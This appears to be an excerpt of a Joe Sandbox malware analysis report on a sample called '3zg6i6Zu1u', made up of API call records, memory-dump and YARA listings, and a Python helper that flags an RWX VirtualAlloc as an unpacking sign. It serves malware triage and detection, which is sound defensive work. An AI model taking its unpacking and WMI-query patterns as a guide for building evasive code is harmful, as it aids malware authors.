• Opcode ID: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
• Instruction ID: 2264aa9d2aabd2ef6d2248d85dbb31dab42ea94ade32cd6cf29d8f8327bb6f23
• Opcode Fuzzy Hash: 8b84c401ed621f98c69bb3f8c5d8cc5e5be64f5d27f130d331e977eda1e0ff18
• Instruction Fuzzy Hash: 18A012300401109AC5141B00BD09FC53E10DB11211F010051B000040B182508841C5C4
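The API records above (and the VirtualAlloc record that follows) are only useful to an analyst once the raw hex arguments are decoded: CoInitializeEx/CoInitializeSecurity with impersonation level 3 is the standard COM setup that precedes a WMI query, WSAStartup(0x0202) requests Winsock 2.2, and a VirtualAlloc with flProtect 0x40 issued from a call site outside the main image is the unpacking pattern the report's "Detected unpacking" signatures refer to. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample; it parses the API lines exactly as printed above (embedded as constructed input) and flags the RWX allocation. The image range 0x00400000-0x00460000 is an assumption: the report shows the module mapped at 00400000 with a section dump at 00454000, but its true SizeOfImage is not in this excerpt.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: the seven API records as they appear in the
# Joe Sandbox listing (function.module(args), ref: call-site address).
SAMPLE_RECORDS = """\
RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,00000000,0040B308,00000000,00000001), ref: 0043C302
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
WSAStartup.WS2_32(00000202), ref: 00409D57
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C607
RtlFreeHeap.NTDLL(?,00000000,?,0043C31B,?,0040B308,00000000,00000001), ref: 0043A960
RtlAllocateHeap.NTDLL(?,00000000), ref: 0043A931
VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009A996E
"""

# Assumption: main image spans 0x00400000-0x00460000 (image base from the
# report; the end address is a guess, the real SizeOfImage is not shown).
IMAGE_START, IMAGE_END = 0x00400000, 0x00460000

RECORD_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")

# Documented Win32/COM constants used to decode the argument columns.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
COINIT = {0x0: "COINIT_MULTITHREADED", 0x2: "COINIT_APARTMENTTHREADED"}
AUTHN_LEVEL = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE",
               2: "RPC_C_AUTHN_LEVEL_CONNECT", 3: "RPC_C_AUTHN_LEVEL_CALL",
               4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
               6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
IMP_LEVEL = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS",
             2: "RPC_C_IMP_LEVEL_IDENTIFY", 3: "RPC_C_IMP_LEVEL_IMPERSONATE",
             4: "RPC_C_IMP_LEVEL_DELEGATE"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]          # None where the sandbox logged "?"
    ref: int                           # call-site address
    notes: List[str] = field(default_factory=list)
    suspicious: bool = False


def parse_record(line: str) -> ApiCall:
    """Parse one 'Func.MODULE(a,b,c), ref: ADDR' line into an ApiCall."""
    m = RECORD_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an API record: {line!r}")
    name, module, raw_args, ref = m.groups()
    args = [None if a == "?" else int(a, 16) for a in raw_args.split(",") if a]
    return ApiCall(name, module, args, int(ref, 16))


def in_image(addr: int) -> bool:
    return IMAGE_START <= addr < IMAGE_END


def annotate(call: ApiCall) -> ApiCall:
    """Decode the arguments that matter for triage; flag the RWX-from-non-image pattern."""
    a = call.args
    if call.name == "VirtualAlloc" and len(a) == 4 and a[3] is not None:
        alloc = ALLOC_TYPE.get(a[2], "?" if a[2] is None else hex(a[2]))
        prot = PAGE_PROTECT.get(a[3], hex(a[3]))
        call.notes.append(f"{alloc} | {prot}")
        if prot == "PAGE_EXECUTE_READWRITE":
            call.suspicious = True
            call.notes.append("RWX allocation")
            if not in_image(call.ref):
                call.notes.append("call site outside main image (already unpacked/injected code)")
    elif call.name == "CoInitializeEx" and len(a) == 2 and a[1] is not None:
        call.notes.append(COINIT.get(a[1], hex(a[1])))
    elif call.name == "CoInitializeSecurity" and len(a) == 9:
        authn = AUTHN_LEVEL.get(a[4], str(a[4]))
        imp = IMP_LEVEL.get(a[5], str(a[5]))
        call.notes.append(f"authn={authn} imp={imp}")
        if a[5] == 3:
            call.notes.append("WMI-style COM security setup (impersonation)")
    elif call.name == "WSAStartup" and len(a) == 1 and a[0] is not None:
        call.notes.append(f"Winsock {a[0] & 0xFF}.{a[0] >> 8}")   # low byte = major
    return call


def triage(text: str) -> List[ApiCall]:
    return [annotate(parse_record(l)) for l in text.splitlines() if l.strip()]


def flagged_refs(calls: List[ApiCall]) -> List[int]:
    return [c.ref for c in calls if c.suspicious]


if __name__ == "__main__":
    for c in triage(SAMPLE_RECORDS):
        mark = "!!" if c.suspicious else "  "
        print(f"{mark} {c.ref:08X} {c.name:<22} {'; '.join(c.notes)}")
```

The "!!" line is the VirtualAlloc at 009A996E: the sandbox attributes that call site to the 009A9000 dump, which is "based on PE: false", so code already running outside the image is committing executable, writable memory, which is what you expect to see just before the next stage is written and jumped to. The heap calls are left undecorated on purpose; they carry no triage signal on their own.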
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 009A996E
Memory Dump Source
• Source File: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009A9000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a9000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                          • Instruction ID: 7e6ae945e1ad9deacbda4d6e4840ec046eea135f2c92e5eb09e554c14f995a9b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5112A79A00208EFDB01DF98C985E99BBF5AB49350F058094F9489B362D371EA50DB81
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3861434553-0
                                                                                                                                                                                                                                                          • Opcode ID: 2f66f3a0d5cf90002a3e6a9fa3fcee9ac7d9c218353d55ba06cc219d7cd29388
                                                                                                                                                                                                                                                          • Instruction ID: d9540b01f5847f02dc4681d7ac8599416201f8ff36d73ea169f27b9f71756f01
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f66f3a0d5cf90002a3e6a9fa3fcee9ac7d9c218353d55ba06cc219d7cd29388
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46D022BCD0C106CBE208DF21EC40436B2B2AFCF30AF14583AD003232B2E636A4118A0E
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $ $ $ $!$"$"$"$"$$$$$$$&$&$&$'$($($*$*$*$,$,$,$-$.$.$.$.$0$0$2$2$3$4$4$4$4$5$6$6$7$8$8$8$9$9$:$:$:$<$=$>$@$D$D$D$E$G$I$I$K$K$M$O$P$Q$S$S$U$V$W$X$Y$Y$[$[$]$]$^$_$_$_$`$b$e$e$g$h$j$l$o$o$p$p$s$t$t$t$x$x$y$z$|$}
                                                                                                                                                                                                                                                          • API String ID: 0-2173774466
                                                                                                                                                                                                                                                          • Opcode ID: 613c8e147c67d88f1679a4c1d382fc397d039c2bac889df07ef81e194eacbfd5
                                                                                                                                                                                                                                                          • Instruction ID: ac2beedd933460f3ba4222b2b0d50247177fc024c692f859e84907f08a89864b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 613c8e147c67d88f1679a4c1d382fc397d039c2bac889df07ef81e194eacbfd5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD139C7161C7C08AD335EB28C4543AFBFE2ABD6314F088A6ED4D987392D6B98445CB53
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $ $ $ $!$"$"$"$"$$$$$$$&$&$&$'$($($*$*$*$,$,$,$-$.$.$.$.$0$0$2$2$3$4$4$4$4$5$6$6$7$8$8$8$9$9$:$:$:$<$=$>$@$D$D$D$E$G$I$I$K$K$M$O$P$Q$S$S$U$V$W$X$Y$Y$[$[$]$]$^$_$_$_$`$b$e$e$g$h$j$l$o$o$p$p$s$t$t$t$x$x$y$z$|$}
                                                                                                                                                                                                                                                          • API String ID: 0-2173774466
                                                                                                                                                                                                                                                          • Opcode ID: b9753955d8b0ad29877f9f28243419e93db33d3574ea54cea941ce0070e24877
                                                                                                                                                                                                                                                          • Instruction ID: af53e175c28fad5d8c2a468ceeaa10e57feed0e13a8b405b96cf19100150d275
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9753955d8b0ad29877f9f28243419e93db33d3574ea54cea941ce0070e24877
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA13BE7160C7C08AD335DB38C4443AFBBE1ABD6314F188A6EE4D987392D6B98581CB57
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                                                                                                                                                                                          • API String ID: 0-2551631551
                                                                                                                                                                                                                                                          • Opcode ID: c701f8ff301ff4d564478b7e145c54238edd9269f203648a2ce05032ff415add
                                                                                                                                                                                                                                                          • Instruction ID: 858507aa584cf820fcee936bcb237444eab22d99ea273c95f327deba7f7eacfc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c701f8ff301ff4d564478b7e145c54238edd9269f203648a2ce05032ff415add
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33228021D087D98EDB22C67C88583DDBFB11B67224F0843D9D4E96B3D2C7754A46CBA2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                                                                                                                                                                                          • API String ID: 0-2551631551
                                                                                                                                                                                                                                                          • Opcode ID: 5571d7a2c4e6fe242554b8ee8fbc541d345d9774545682d32326d94ed6a6aae3
                                                                                                                                                                                                                                                          • Instruction ID: 770335e5a42f9b4d615ca172ea7afd8b2f0587deb4f207754e917c3cbcfa6561
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5571d7a2c4e6fe242554b8ee8fbc541d345d9774545682d32326d94ed6a6aae3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C224121D087D98DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7794A46CBA6
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                                                                                                                                                                                          • API String ID: 0-2551631551
                                                                                                                                                                                                                                                          • Opcode ID: d810674a082763aa70e2500657bedc2216948e509afcc73f942382a721652a8c
                                                                                                                                                                                                                                                          • Instruction ID: 249ebcf4ec149b743213101689c7c094816aa5abeba1e5f208d66dca9af544ea
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d810674a082763aa70e2500657bedc2216948e509afcc73f942382a721652a8c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46226F21D087DACDDB22C67C885839DBFB11B27224F0843D9D4E96B3D2C7754A46CBA6
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $!$"$#$#$%$'$'$)$)$+$+$-$/$0$1$2$3$3$4$6$8$9$9$;$?$A$C$E$G$I$K$M$O$P$Q$S$U$W$X$X$Y$[$]$_$a$b$c$d$e$g$h$h$i$k$l$m$o$p$q$s$t$t$u$w$y${$}
                                                                                                                                                                                                                                                          • API String ID: 0-2551631551
                                                                                                                                                                                                                                                          • Opcode ID: bf3661bb3983fb85d3086f1722b7d7b11c57bc7e0144b52ab0816061f3dab287
                                                                                                                                                                                                                                                          • Instruction ID: de50ea2c20b4176c8acefd8da3a13ecea5557a43b1ccc23e89203943b2e10b97
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf3661bb3983fb85d3086f1722b7d7b11c57bc7e0144b52ab0816061f3dab287
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99225121D087DA8DDB22C67C884839DBFB11B67324F0843D9D4E96B3D2C7754A46CBA6
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $$0$1$4$<$>$M$Q$R$S$U$a$b$c$c$e$g$g$i$k$m$n$o$q$s$u$w$y${$}$~
                                                                                                                                                                                                                                                          • API String ID: 0-379513683
                                                                                                                                                                                                                                                          • Opcode ID: db3bbc2852807f260050379881b4d3eba7f21407b1fc4a639028f95d2bc8165e
                                                                                                                                                                                                                                                          • Instruction ID: 6951834232966a2342cda561313f373f27e489b71b577a9f1bbade8454517541
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db3bbc2852807f260050379881b4d3eba7f21407b1fc4a639028f95d2bc8165e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDF18131D087E98ADB36C63C8C543DDAEA15B66324F0843E9C4AD6B3D2C7B54A85CB52
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $$0$1$4$<$>$M$Q$R$S$U$a$b$c$c$e$g$g$i$k$m$n$o$q$s$u$w$y${$}$~
                                                                                                                                                                                                                                                          • API String ID: 0-379513683
                                                                                                                                                                                                                                                          • Opcode ID: cfa054dc800593ef20723bf0e07abeb3e5f3e33d89c21528bf78c2c7209d6cbb
                                                                                                                                                                                                                                                          • Instruction ID: fbc6194e022bf2d7584349dbc9d518ea0f683462fe8accb2f8c95ac37d1c220e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa054dc800593ef20723bf0e07abeb3e5f3e33d89c21528bf78c2c7209d6cbb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBF1D2319087E98ADB36C63C8C543DDBEA25B56324F0843E9C4ED6B3D2C6B50BC58B56
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 024A8049
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 024A80AE
                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(680742DE,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024A80F7
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 024A814F
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(F9BDF745), ref: 024A8227
                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 024A8299
                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 024A841F
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocString$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                          • String ID: Z>\$/^&P$/^&PZ>\$0R/T$C$Gx$Ljkl$ab$pyz{
                                                                                                                                                                                                                                                          • API String ID: 305737880-109390196
                                                                                                                                                                                                                                                          • Opcode ID: f5650649af3bb8683cce130507ff282943505e9f99ba66872af77d97622111cc
                                                                                                                                                                                                                                                          • Instruction ID: d219e338c2c54160316490cec37c8b2350c52324b68cfd502d67b8f5149e4bd4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5650649af3bb8683cce130507ff282943505e9f99ba66872af77d97622111cc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB12EE72A083509FD320CF68C894B5BBBE1EFD5714F194A2DEAE49B390D774D8058B82
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: V%h$$rt$*^,P$+N;@$:J4L$<F9X$=Z$\$G6HH$H2P4$L.[ $Q>b0$V*H,$X"\$$[&'8$g"w$$k:~<$l*G,$r&f8$~.p
                                                                                                                                                                                                                                                          • API String ID: 0-2572281532
                                                                                                                                                                                                                                                          • Opcode ID: f2b735d5565443e60b290a4db958f3dd542149773ac8ca26e3220f171de3171a
                                                                                                                                                                                                                                                          • Instruction ID: 90569e0cdcbd1feedc69857b1e463444e89737a1b4f21c7a31be227e82eadc65
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2b735d5565443e60b290a4db958f3dd542149773ac8ca26e3220f171de3171a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C781ABB29193D18BC33A8F15C8853DFBBE2FBC0304F598A2DC8998B254DB754606CB46
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: V%h$$rt$*^,P$+N;@$:J4L$<F9X$=Z$\$G6HH$H2P4$L.[ $Q>b0$V*H,$X"\$$[&'8$g"w$$k:~<$l*G,$r&f8$~.p
                                                                                                                                                                                                                                                          • API String ID: 0-2572281532
                                                                                                                                                                                                                                                          • Opcode ID: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
                                                                                                                                                                                                                                                          • Instruction ID: fc9c91e7f1a30bb03526ffdc58390b239219c7e1b2437cd68821ef081b52b0d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd7f63e964f488d677be3c97ab2ce72dca3788d71f0cf761aaeb2d60bf982ccf
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B581BEB29193918BC33A8F15C8853DFBBE2FBC0304F59892DC4999B354DB754602CB4A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
                                                                                                                                                                                                                                                          • API String ID: 0-416511104
                                                                                                                                                                                                                                                          • Opcode ID: adba4028a27d79ef5c5b54763bf1222529bcdb3dd089f517822c49e845e26f1c
                                                                                                                                                                                                                                                          • Instruction ID: daa9f333963be5f1a23f679923f30bb54875b00dd6237d57aa334e075f8ce29e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adba4028a27d79ef5c5b54763bf1222529bcdb3dd089f517822c49e845e26f1c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6421AB560C3948AD334CF55D442BCFBAF2FB92304F00882DC5D9AB615DBB54A468B97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
• API String ID: 0-416511104
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: 't+v$,{+}$0s&u$6<$7w.y$9:$;?$>R$B?y!$SK$U;W=$Z7W9$^T$bc$l+j-$q#s%$s'k)
• API String ID: 0-416511104
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: $$($($-$A$G$I$N$X$l$n${
• API String ID: 0-3018408179
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: $$($($-$A$G$I$N$X$l$n${
• API String ID: 0-3018408179
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: !@$,$/$5$6$B$D$k$m$n$o
• API String ID: 0-3097700080
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: !@$,$/$5$6$B$D$k$m$n$o
• API String ID: 0-3097700080
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
